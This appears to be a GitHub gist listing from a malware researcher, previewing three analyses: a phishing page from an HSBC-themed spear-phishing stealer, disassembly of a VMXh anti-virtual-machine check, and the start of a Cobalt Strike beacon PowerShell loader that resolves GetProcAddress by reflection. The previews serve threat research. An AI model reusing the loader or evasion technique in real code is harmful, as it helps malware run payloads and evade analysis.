x86fatah
/ CreepyQuestionableGroupware_index.html
Last active
May 31, 2024 01:18
Spear-Phishing Stealer Targeting Malaysian: HSBC E-Mail Analysis
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://replit.com/@lengoma/CreepyQuestionableGroupware?v=1#index.html | |
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <meta charset="utf-8"> | |
| <meta name="viewport" content="width=device-width"> | |
| <title>replit</title> | |
| <link href="style.css" rel="stylesheet" type="text/css" /> |
x86fatah
/ Anti Virtual Machine (VMXh).asm
Last active
June 4, 2024 17:33
Disassembled Pattern of Malicious Code Collection
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; Anti Virtual Machine (VMXh) | |
| ; | |
| ; Indicator : | |
| ; - 564D5868h (Hex) -> VMXh (ASCII) | |
| ; - ED | |
| ; | |
| ; .text:100061DB ED in eax, dx | |
| ; .text:100061DC 81 FB 68 58 4D 56 cmp ebx, 'VMXh' | |
x86fatah
/ 858f567340cee8755dbd745b6afd9adc78a998bf2cbfda85e6302197994c577c.ps1
Last active
June 25, 2024 09:32
Cobalt Strike Beacons Analysis 2024
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Malware code that was written in spaces and tabs. | |
| Set-StrictMode -Version 2 | |
| $DoIt = @' | |
| function func_get_proc_address { | |
| Param ($var_module, $var_procedure) | |
| $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') | |
| $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string')) | |
| return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure)) |